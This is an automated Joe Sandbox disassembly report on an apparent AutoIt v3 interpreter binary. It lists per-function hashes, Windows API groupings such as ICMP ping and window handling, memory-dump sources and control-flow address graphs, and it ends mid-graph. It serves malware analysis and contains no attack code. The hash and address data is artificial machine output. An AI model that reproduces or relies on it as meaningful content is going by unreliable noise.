                                                                                                                                                                      • Opcode ID: c7631b601c556c7217535abd22ec3b31add296a0ae578bc92de2dd3d0e1177b6
                                                                                                                                                                      • Instruction ID: 4592763c378b60b0e1f38865ef025ce1a697031eb0ddd255eed6f9247b222edb
                                                                                                                                                                      • Opcode Fuzzy Hash: c7631b601c556c7217535abd22ec3b31add296a0ae578bc92de2dd3d0e1177b6
                                                                                                                                                                      • Instruction Fuzzy Hash: D4D2C372A0CA4A92EB60AF95D4442BDB362FB44F94F844131DE4E477A4EF7DE441E320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1385522511-0
                                                                                                                                                                      • Opcode ID: 7579f0c320917bac1730762a7ae16fb7a451c07450a9c0a7c1cc55cdb2f27aef
                                                                                                                                                                      • Instruction ID: fe890bf9b750b71d69847f4136dcd26877b67a91ba051b9976c2611b7e7c6861
                                                                                                                                                                      • Opcode Fuzzy Hash: 7579f0c320917bac1730762a7ae16fb7a451c07450a9c0a7c1cc55cdb2f27aef
                                                                                                                                                                      • Instruction Fuzzy Hash: A5829E72A0D64AA2EB50EFA1E444679B3A2FB44F84F854035DE4D477A0EF3DE941E720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 48322524-0
                                                                                                                                                                      • Opcode ID: 7c5168f3b9adef50d38398ac74ed53a3ec73362a57f70731c05e6a0fe4b7c129
                                                                                                                                                                      • Instruction ID: 8827ac78fbffea4f1eb55cae81d7b1e509fb7aa5ec763da1c56db24111e3f3e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 7c5168f3b9adef50d38398ac74ed53a3ec73362a57f70731c05e6a0fe4b7c129
                                                                                                                                                                      • Instruction Fuzzy Hash: 18E0ED20D0D60AA3D924ABA4A484378A350BF55F75FE00330D57E052D4EF2CE448A520
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharInputStateUpper
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3481770908-0
                                                                                                                                                                      • Opcode ID: 33aa1466423327e6eda594250b5cfccb10c396606bcb6fb5646ee98d95e330ff
                                                                                                                                                                      • Instruction ID: dc07843ca5ded6b17bb83e6a16e3bb8f20029873212f5c7dca0e4e125c0b9b92
                                                                                                                                                                      • Opcode Fuzzy Hash: 33aa1466423327e6eda594250b5cfccb10c396606bcb6fb5646ee98d95e330ff
                                                                                                                                                                      • Instruction Fuzzy Hash: 29E2EB72A0C69AA6EB10EFA5E4446BDB7B1FB44F84F904135DA4D07B94EF38E450DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                                                                                      • API String ID: 2667193904-1575078665
                                                                                                                                                                      • Opcode ID: c7741d95bee3c6fd32f8d3b7d1974c07ae3417e6abdaa5afebd90e0a4014c184
                                                                                                                                                                      • Instruction ID: 7192f60a0e29774799602cde605caf9c434361ec8e25ae303ae05a8a78ede715
                                                                                                                                                                      • Opcode Fuzzy Hash: c7741d95bee3c6fd32f8d3b7d1974c07ae3417e6abdaa5afebd90e0a4014c184
                                                                                                                                                                      • Instruction Fuzzy Hash: F7919022A1C65BA1EB10FBA4E8444B9E364FF84B44FD04132E94D47AA5FFBCE105E760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 389 7ff73d0d3b44-7ff73d0d3b8e call 7ff73d04fc40 392 7ff73d0d3b90-7ff73d0d3b9f call 7ff73d04e4e4 389->392 393 7ff73d0d3bb1-7ff73d0d3bc3 WSAStartup 389->393 392->393 400 7ff73d0d3ba1-7ff73d0d3bae call 7ff73d04e4e4 392->400 394 7ff73d0d3bc5-7ff73d0d3be8 call 7ff73d041e5c * 2 393->394 395 7ff73d0d3bed-7ff73d0d3c32 call 7ff73d0474fc call 7ff73d04b1c0 call 7ff73d05c4d4 inet_addr gethostbyname 393->395 409 7ff73d0d3dd6-7ff73d0d3df3 394->409 412 7ff73d0d3c43-7ff73d0d3c66 call 7ff73d041e5c * 2 395->412 413 7ff73d0d3c34-7ff73d0d3c41 IcmpCreateFile 395->413 400->393 422 7ff73d0d3dcc-7ff73d0d3dd1 call 7ff73d047590 412->422 413->412 414 7ff73d0d3c6b-7ff73d0d3cb7 call 7ff73d0651a8 call 7ff73d05d18c 413->414 425 7ff73d0d3cc4 414->425 426 7ff73d0d3cb9-7ff73d0d3cc2 414->426 422->409 427 7ff73d0d3cc6-7ff73d0d3ce1 IcmpSendEcho 425->427 426->427 428 7ff73d0d3ce3-7ff73d0d3ce9 427->428 429 7ff73d0d3d44-7ff73d0d3d5e call 7ff73d041e5c 427->429 431 7ff73d0d3d85-7ff73d0d3d9e call 7ff73d04fc40 428->431 432 7ff73d0d3cef-7ff73d0d3cf4 428->432 439 7ff73d0d3d7a-7ff73d0d3d83 call 7ff73d041e5c 429->439 444 7ff73d0d3da0-7ff73d0d3db8 IcmpCloseHandle WSACleanup 431->444 433 7ff73d0d3cf6-7ff73d0d3cfb 432->433 434 7ff73d0d3d60-7ff73d0d3d73 call 7ff73d041e5c 432->434 433->429 437 7ff73d0d3cfd-7ff73d0d3d02 433->437 434->439 442 7ff73d0d3d04-7ff73d0d3d09 437->442 443 7ff73d0d3d27-7ff73d0d3d42 call 7ff73d041e5c 437->443 439->444 442->434 447 7ff73d0d3d0b-7ff73d0d3d25 call 7ff73d041e5c 442->447 443->439 444->422 448 7ff73d0d3dba-7ff73d0d3dc7 call 7ff73d065164 * 2 444->448 447->439 448->422
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                                                                                                                      • String ID: 5$Ping
                                                                                                                                                                      • API String ID: 1486594354-1972892582
                                                                                                                                                                      • Opcode ID: 230605a8232c8122680c35d0e6caf390dfb89a6af6dc93b85a8d462a5da27765
                                                                                                                                                                      • Instruction ID: 689cbb685dd2f5a3722b936134bfa8ab849c855d014230a70d2ed9340cbb1a0d
                                                                                                                                                                      • Opcode Fuzzy Hash: 230605a8232c8122680c35d0e6caf390dfb89a6af6dc93b85a8d462a5da27765
                                                                                                                                                                      • Instruction Fuzzy Hash: 84717162E0C64AA2EB10EBA6D4A437DB7A0FF84F90F814432DA5D47391EF7CD4459B21
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 456 7ff73d042efc-7ff73d042f31 458 7ff73d042fa1-7ff73d042fa4 456->458 459 7ff73d042f33-7ff73d042f36 456->459 458->459 462 7ff73d042fa6 458->462 460 7ff73d042fa8 459->460 461 7ff73d042f38-7ff73d042f3f 459->461 466 7ff73d042fae-7ff73d042fb3 460->466 467 7ff73d08a739-7ff73d08a771 call 7ff73d043de0 call 7ff73d0632fc 460->467 463 7ff73d043031-7ff73d043039 PostQuitMessage 461->463 464 7ff73d042f45-7ff73d042f4a 461->464 465 7ff73d042f7b-7ff73d042f86 DefWindowProcW 462->465 472 7ff73d042fd8-7ff73d042fda 463->472 468 7ff73d08a7bf-7ff73d08a7d5 call 7ff73d0bb0e4 464->468 469 7ff73d042f50-7ff73d042f53 464->469 471 7ff73d042f8c-7ff73d042fa0 465->471 473 7ff73d042fdc-7ff73d04300a SetTimer RegisterWindowMessageW 466->473 474 7ff73d042fb5-7ff73d042fb8 466->474 503 7ff73d08a777-7ff73d08a77e 467->503 468->472 494 7ff73d08a7db 468->494 475 7ff73d042f59-7ff73d042f5e 469->475 476 7ff73d04303b-7ff73d043045 call 7ff73d041140 469->476 472->471 473->472 477 7ff73d04300c-7ff73d043019 CreatePopupMenu 473->477 480 7ff73d042fbe-7ff73d042fd3 KillTimer call 7ff73d042e98 call 7ff73d0444a4 474->480 481 7ff73d08a6c8-7ff73d08a6cb 474->481 483 7ff73d08a7a2-7ff73d08a7a9 475->483 484 7ff73d042f64-7ff73d042f69 475->484 496 7ff73d04304a 476->496 477->472 480->472 488 7ff73d08a707-7ff73d08a734 MoveWindow 481->488 489 7ff73d08a6cd-7ff73d08a6d0 481->489 483->465 491 7ff73d08a7af-7ff73d08a7ba call 7ff73d0ad1ac 483->491 492 7ff73d04301b-7ff73d04302f call 7ff73d04304c 484->492 493 7ff73d042f6f-7ff73d042f75 484->493 488->472 497 7ff73d08a6d2-7ff73d08a6d5 489->497 498 7ff73d08a6f4-7ff73d08a702 SetFocus 489->498 491->465 492->472 493->465 493->503 494->465 496->472 497->493 499 7ff73d08a6db-7ff73d08a6ef call 7ff73d043de0 497->499 498->472 499->472 503->465 507 7ff73d08a784-7ff73d08a79d call 7ff73d042e98 call 7ff73d043370 503->507 507->465
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                      • Opcode ID: 01a05819f3139090977056a6ae443ceb9ff842bd93d36ce1a55f375606104ef1
                                                                                                                                                                      • Instruction ID: 0021e8278dd3396bfcc192dbd4409bb78e8399e4f0af1396f7b31c1c07298155
                                                                                                                                                                      • Opcode Fuzzy Hash: 01a05819f3139090977056a6ae443ceb9ff842bd93d36ce1a55f375606104ef1
                                                                                                                                                                      • Instruction Fuzzy Hash: EC518121E1C51FA1F750BBA5E848678E665AF41F80FC40131D44E426A1FFAEE589BB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                      • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                      • API String ID: 2914291525-2659433951
                                                                                                                                                                      • Opcode ID: 4f4b142336d7185ab5ba47471063aeefe10dde5161c241b84d2c0fddd58e2983
                                                                                                                                                                      • Instruction ID: b188720a27a4ae98b27ed14b7548fb8678604790b5a1bc105c9f0f076d7a7d1b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4f4b142336d7185ab5ba47471063aeefe10dde5161c241b84d2c0fddd58e2983
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B316B32A08B0AAAE740DFA0F8843AC77B8FB44758F940135CA4D13B54EF7D9198D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 514 7ff73d04c3e0-7ff73d04c433 515 7ff73d04c439-7ff73d04c46b call 7ff73d0459b4 call 7ff73d05cb68 514->515 516 7ff73d09848e-7ff73d0984a8 call 7ff73d0b8350 514->516 522 7ff73d0984af-7ff73d0984c9 call 7ff73d0b8350 515->522 525 7ff73d04c471-7ff73d04c497 call 7ff73d0472b8 call 7ff73d064b18 call 7ff73d0472b8 call 7ff73d05d3f4 515->525 516->522 529 7ff73d0984cf-7ff73d0984d7 522->529 543 7ff73d04c49c-7ff73d04c4d3 call 7ff73d05c734 call 7ff73d05cd48 525->543 532 7ff73d04c4d9-7ff73d04c557 call 7ff73d0472b8 * 2 call 7ff73d04533c call 7ff73d045e74 SetCurrentDirectoryW call 7ff73d047590 * 2 call 7ff73d0651a8 call 7ff73d05d18c 529->532 533 7ff73d0984dd-7ff73d09850d call 7ff73d04597c call 7ff73d05c820 529->533 586 7ff73d04c55c-7ff73d04c55e 532->586 547 7ff73d098513-7ff73d098533 call 7ff73d0c382c call 7ff73d05c8ec 533->547 548 7ff73d09882e-7ff73d09884d call 7ff73d0b8350 533->548 543->529 543->532 547->548 567 7ff73d098539-7ff73d0985cb call 7ff73d06516c call 7ff73d0488a8 call 7ff73d048790 547->567 559 7ff73d04c682-7ff73d04c6c0 call 7ff73d047590 * 2 call 7ff73d04594c 548->559 584 7ff73d0985d1-7ff73d0985fc call 7ff73d0488a8 567->584 585 7ff73d09879b-7ff73d0987d8 call 7ff73d0488a8 call 7ff73d0c0f3c call 7ff73d0b19a4 call 7ff73d069304 567->585 595 7ff73d098611-7ff73d098617 584->595 596 7ff73d0985fe-7ff73d09860c 584->596 631 7ff73d0987db-7ff73d0987f0 call 7ff73d047b44 call 7ff73d047c38 585->631 588 7ff73d04c564-7ff73d04c572 call 7ff73d047da0 586->588 589 7ff73d04c64f-7ff73d04c66e call 7ff73d04597c SetCurrentDirectoryW 586->589 588->589 605 7ff73d04c578-7ff73d04c590 call 7ff73d04bfec call 7ff73d04c080 588->605 589->559 604 7ff73d04c670-7ff73d04c67d call 7ff73d065164 * 2 589->604 602 7ff73d098619-7ff73d098629 595->602 603 7ff73d09862e-7ff73d098634 595->603 601 7ff73d09871e-7ff73d098732 call 7ff73d048790 596->601 601->584 621 7ff73d098738-7ff73d098741 601->621 602->601 608 7ff73d098636-7ff73d098648 603->608 609 7ff73d09864d-7ff73d098654 603->609 604->559 629 7ff73d098889-7ff73d0988aa call 7ff73d0b8350 605->629 630 7ff73d04c596-7ff73d04c5ac call 7ff73d04c148 call 7ff73d0692e8 605->630 608->601 609->601 615 7ff73d09865a-7ff73d098670 call 7ff73d0b8078 609->615 627 7ff73d098672-7ff73d09869a call 7ff73d04c848 call 7ff73d047590 615->627 628 7ff73d09869c-7ff73d0986a3 615->628 625 7ff73d098743-7ff73d098751 621->625 626 7ff73d09877b-7ff73d098783 call 7ff73d0b8778 621->626 625->626 632 7ff73d098753-7ff73d098779 call 7ff73d04bee4 625->632 649 7ff73d098787-7ff73d098795 626->649 677 7ff73d0986c4-7ff73d0986d6 call 7ff73d0488a8 627->677 638 7ff73d0986a5-7ff73d0986c2 call 7ff73d04c848 call 7ff73d04ae5c call 7ff73d047590 628->638 639 7ff73d0986d8-7ff73d0986db 628->639 629->589 663 7ff73d04c5ae-7ff73d04c5c1 call 7ff73d06ae88 630->663 664 7ff73d04c5c7 630->664 631->559 632->649 638->677 644 7ff73d098703-7ff73d098708 call 7ff73d0c0fe0 639->644 645 7ff73d0986dd-7ff73d0986e7 call 7ff73d0b7f84 639->645 660 7ff73d09870d-7ff73d09871a call 7ff73d065164 644->660 665 7ff73d0987f5-7ff73d09882c call 7ff73d0b8350 call 7ff73d065164 call 7ff73d069304 645->665 666 7ff73d0986ed-7ff73d0986fe call 7ff73d065164 645->666 649->584 649->585 660->601 663->664 685 7ff73d04c6c1-7ff73d04c6ca 663->685 673 7ff73d04c5ca-7ff73d04c5cf 664->673 665->631 666->584 681 7ff73d09885f-7ff73d09886a call 7ff73d0b7ef0 673->681 682 7ff73d04c5d5-7ff73d04c60c call 7ff73d04c848 call 7ff73d04c1ac call 7ff73d047590 673->682 677->660 698 7ff73d098870-7ff73d098873 681->698 705 7ff73d04c6d5 682->705 706 7ff73d04c612-7ff73d04c615 682->706 685->664 690 7ff73d04c6d0-7ff73d09885a 685->690 690->673 700 7ff73d04c6d8-7ff73d04c6dc 698->700 701 7ff73d098879-7ff73d098884 698->701 704 7ff73d04c63c 700->704 703 7ff73d04c640-7ff73d04c649 701->703 703->586 703->589 704->703 705->700 706->700 707 7ff73d04c61b-7ff73d04c61e 706->707 707->698 708 7ff73d04c624-7ff73d04c637 call 7ff73d04bee4 707->708 708->704
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF73D05CB68: CreateFileW.KERNELBASE ref: 00007FF73D05CBD2
                                                                                                                                                                        • Part of subcall function 00007FF73D064B18: GetCurrentDirectoryW.KERNEL32(?,00007FF73D04C483), ref: 00007FF73D064B34
                                                                                                                                                                        • Part of subcall function 00007FF73D05D3F4: GetFullPathNameW.KERNEL32(?,00007FF73D05D3E1,?,00007FF73D044D38,?,?,?,00007FF73D04109E), ref: 00007FF73D05D41F
                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE ref: 00007FF73D04C51C
                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE ref: 00007FF73D04C65C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                      • API String ID: 2207129308-3738523708
                                                                                                                                                                      • Opcode ID: c5e7cae54188732221b01c2cfd5b4fe2d0b13dcde0300efd9fa887f96d6c305b
                                                                                                                                                                      • Instruction ID: e98ef66433461738d2c081dab50d6cfb1342f7f401ce33c50b0951b193af6fe6
                                                                                                                                                                      • Opcode Fuzzy Hash: c5e7cae54188732221b01c2cfd5b4fe2d0b13dcde0300efd9fa887f96d6c305b
                                                                                                                                                                      • Instruction Fuzzy Hash: 9412A322A0C65AA5EB10FBA1D4845BEE370FB84B94FC04135EA4D47BA5EF7CD505EB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 710 7ff73d0439a8-7ff73d0439fe 711 7ff73d08ac20-7ff73d08ac26 DestroyWindow 710->711 712 7ff73d043a04-7ff73d043a23 mciSendStringW 710->712 716 7ff73d08ac2c-7ff73d08ac3d 711->716 713 7ff73d043a29-7ff73d043a33 712->713 714 7ff73d043cbb-7ff73d043ccc 712->714 715 7ff73d043a39 713->715 713->716 717 7ff73d043cce-7ff73d043cee UnregisterHotKey 714->717 718 7ff73d043cf5-7ff73d043cff 714->718 719 7ff73d043a40-7ff73d043a43 715->719 720 7ff73d08ac3f-7ff73d08ac42 716->720 721 7ff73d08ac71-7ff73d08ac7b 716->721 717->718 722 7ff73d043cf0 call 7ff73d064cc4 717->722 718->713 723 7ff73d043d05 718->723 725 7ff73d043a49-7ff73d043a58 call 7ff73d043898 719->725 726 7ff73d043cae-7ff73d043cb6 call 7ff73d042770 719->726 727 7ff73d08ac4f-7ff73d08ac53 FindClose 720->727 728 7ff73d08ac44-7ff73d08ac4d call 7ff73d04597c 720->728 721->716 724 7ff73d08ac7d 721->724 722->718 723->714 734 7ff73d08ac82-7ff73d08ac8b call 7ff73d0d9d2c 724->734 741 7ff73d043a5f-7ff73d043a62 725->741 726->719 733 7ff73d08ac59-7ff73d08ac6a 727->733 728->733 733->721 738 7ff73d08ac6c call 7ff73d0c4184 733->738 734->741 738->721 741->734 743 7ff73d043a68 741->743 744 7ff73d043a6f-7ff73d043a72 743->744 745 7ff73d08ac90-7ff73d08ac99 call 7ff73d0b53a4 744->745 746 7ff73d043a78-7ff73d043a82 744->746 745->744 748 7ff73d043a88-7ff73d043a92 746->748 749 7ff73d08ac9e-7ff73d08acaf 746->749 753 7ff73d043a98-7ff73d043ac6 call 7ff73d04fc40 748->753 754 7ff73d08acc8-7ff73d08acd9 748->754 751 7ff73d08acb1 FreeLibrary 749->751 752 7ff73d08acb7-7ff73d08acc1 749->752 751->752 752->749 757 7ff73d08acc3 752->757 762 7ff73d043ac8 753->762 763 7ff73d043b0f-7ff73d043b1c OleUninitialize 753->763 755 7ff73d08ad05-7ff73d08ad0f 754->755 756 7ff73d08acdb-7ff73d08acfe VirtualFree 754->756 755->754 760 7ff73d08ad11 755->760 756->755 759 7ff73d08ad00 call 7ff73d0c4220 756->759 757->754 759->755 766 7ff73d08ad16-7ff73d08ad1a 760->766 765 7ff73d043acd-7ff73d043b0d call 7ff73d04410c call 7ff73d044084 762->765 763->766 767 7ff73d043b22-7ff73d043b29 763->767 765->763 766->767 769 7ff73d08ad20-7ff73d08ad2b 766->769 770 7ff73d08ad30-7ff73d08ad3f call 7ff73d0c41d8 767->770 771 7ff73d043b2f-7ff73d043b3a 767->771 769->767 784 7ff73d08ad41 770->784 773 7ff73d043d07-7ff73d043d16 call 7ff73d064a58 771->773 774 7ff73d043b40-7ff73d043b57 call 7ff73d047590 call 7ff73d043fc0 771->774 773->774 785 7ff73d043d1c 773->785 787 7ff73d043b5c-7ff73d043bc2 call 7ff73d0437ac call 7ff73d043f44 call 7ff73d047590 call 7ff73d04fc40 call 7ff73d043e64 call 7ff73d043e28 * 3 774->787 788 7ff73d08ad46-7ff73d08ad55 call 7ff73d0b4700 784->788 785->773 787->788 819 7ff73d043bc8-7ff73d043bda call 7ff73d0437ac 787->819 794 7ff73d08ad57 788->794 797 7ff73d08ad5c-7ff73d08ad6b call 7ff73d05f2bc 794->797 803 7ff73d08ad6d 797->803 806 7ff73d08ad72-7ff73d08ad81 call 7ff73d0c407c 803->806 812 